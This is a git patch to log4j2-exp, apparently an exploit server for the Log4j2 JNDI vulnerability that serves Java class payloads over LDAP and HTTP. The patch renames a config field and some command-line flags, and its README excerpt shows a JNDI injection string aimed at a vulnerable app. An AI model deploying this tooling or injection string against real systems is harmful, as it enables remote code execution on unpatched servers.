From cb4e0e09e248fb52b6f1dd7e6e32989ec5fff115 Mon Sep 17 00:00:00 2001 From: For-ACGN <38399410+For-ACGN@users.noreply.github.com> Date: Thu, 16 Dec 2021 16:21:01 +0800 Subject: [PATCH] rename Config.PayloadDir, update flag name about tls. --- README.md | 11 +++++------ cmd/main.go | 8 ++++---- http.go | 8 ++++---- log4j2.go | 10 +++++----- log4j2_test.go | 14 +++++++------- 5 files changed, 25 insertions(+), 26 deletions(-) diff --git a/README.md b/README.md index 2012158..54a944d 100644 --- a/README.md +++ b/README.md @@ -23,7 +23,7 @@ * ```java -jar vulapp.jar ${jndi:ldap://127.0.0.1/calc.class}``` ## Help - ``` + ``` ::: :::::::: :::::::: ::: ::::::::::: :::::::: :+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ @@ -35,8 +35,6 @@ https://github.com/For-ACGN/log4j2-exp Usage of log4j2-exp.exe: - -dir string - payload(java class) directory (default "payload") -host string server IP address or domain name (default "127.0.0.1") -http-addr string @@ -47,14 +45,15 @@ Usage of log4j2-exp.exe: ldap server address (default ":389") -ldap-net string ldap server network (default "tcp") - -tls - enable ldaps and https server + -payload string + payload(java class) directory (default "payload") -tls-cert string tls certificate file path (default "cert.pem") -tls-key string tls private key file path (default "key.pem") + -tls-server + enable ldaps and https server ``` - ## Screenshot ![](https://github.com/For-ACGN/log4j2-exp/raw/main/screenshot.png) diff --git a/cmd/main.go b/cmd/main.go index 12cb578..7506d4e 100644 --- a/cmd/main.go +++ b/cmd/main.go @@ -22,12 +22,12 @@ func init() { flag.CommandLine.SetOutput(os.Stdout) flag.StringVar(&cfg.Hostname, "host", "127.0.0.1", "server IP address or domain name") - flag.StringVar(&cfg.ClassDirectory, "dir", "payload", "payload(java class) directory") + flag.StringVar(&cfg.PayloadDir, "payload", "payload", "payload(java class) directory") flag.StringVar(&cfg.HTTPNetwork, "http-net", "tcp", "http server network") flag.StringVar(&cfg.HTTPAddress, "http-addr", ":8080", "http server address") flag.StringVar(&cfg.LDAPNetwork, "ldap-net", "tcp", "ldap server network") flag.StringVar(&cfg.LDAPAddress, "ldap-addr", ":389", "ldap server address") - flag.BoolVar(&cfg.EnableTLS, "tls", false, "enable ldaps and https server") + flag.BoolVar(&cfg.EnableTLS, "tls-server", false, "enable ldaps and https server") flag.StringVar(&crt, "tls-cert", "cert.pem", "tls certificate file path") flag.StringVar(&key, "tls-key", "key.pem", "tls private key file path") flag.Parse() @@ -52,10 +52,10 @@ func main() { if cfg.Hostname == "" { log.Fatalln("[error]", "empty host name") } - fi, err := os.Stat(cfg.ClassDirectory) + fi, err := os.Stat(cfg.PayloadDir) checkError(err) if !fi.IsDir() { - log.Fatalf("[error] \"%s\" is not a directory", cfg.ClassDirectory) + log.Fatalf("[error] \"%s\" is not a directory", cfg.PayloadDir) } // load tls certificate if cfg.EnableTLS { diff --git a/http.go b/http.go index 6d29b1b..9790356 100644 --- a/http.go +++ b/http.go @@ -11,8 +11,8 @@ import ( type httpHandler struct { logger *log.Logger - classDir string - secret string + payloadDir string + secret string } func (h *httpHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) { @@ -49,14 +49,14 @@ func (h *httpHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) { // "/secret/Main.class/other.class" to "/secret/other.class" // path = strings.Replace(path, "Main.class", "", 1) // fmt.Println("path:", path) - // path = filepath.Join(h.classDir, path) + // path = filepath.Join(h.payloadDir, path) idx := strings.LastIndex(path, "/") if idx == -1 { h.logger.Println("[error]", "invalid request url structure:", r.RequestURI) return } - path = filepath.Join(h.classDir, path[:idx]) + path = filepath.Join(h.payloadDir, path[:idx]) // read file and send to client class, err := os.ReadFile(path) diff --git a/log4j2.go b/log4j2.go index 9c7c7fa..f652b35 100644 --- a/log4j2.go +++ b/log4j2.go @@ -19,8 +19,8 @@ import ( type Config struct { LogOut io.Writer - Hostname string - ClassDirectory string + Hostname string + PayloadDir string HTTPNetwork string HTTPAddress string @@ -72,9 +72,9 @@ func New(cfg *Config) (*Log4j2, error) { return nil, errors.Wrap(err, "failed to create http listener") } httpHandler := httpHandler{ - logger: logger, - classDir: cfg.ClassDirectory, - secret: secret, + logger: logger, + payloadDir: cfg.PayloadDir, + secret: secret, } httpServer := http.Server{ Handler: &httpHandler, diff --git a/log4j2_test.go b/log4j2_test.go index a2d8fb6..9d27a87 100644 --- a/log4j2_test.go +++ b/log4j2_test.go @@ -17,13 +17,13 @@ import ( func testGenerateConfig() *Config { return &Config{ - LogOut: os.Stdout, - Hostname: "127.0.0.1", - ClassDirectory: "testdata", - HTTPNetwork: "tcp", - HTTPAddress: "127.0.0.1:8088", - LDAPNetwork: "tcp", - LDAPAddress: "127.0.0.1:389", + LogOut: os.Stdout, + Hostname: "127.0.0.1", + PayloadDir: "testdata", + HTTPNetwork: "tcp", + HTTPAddress: "127.0.0.1:8088", + LDAPNetwork: "tcp", + LDAPAddress: "127.0.0.1:389", } }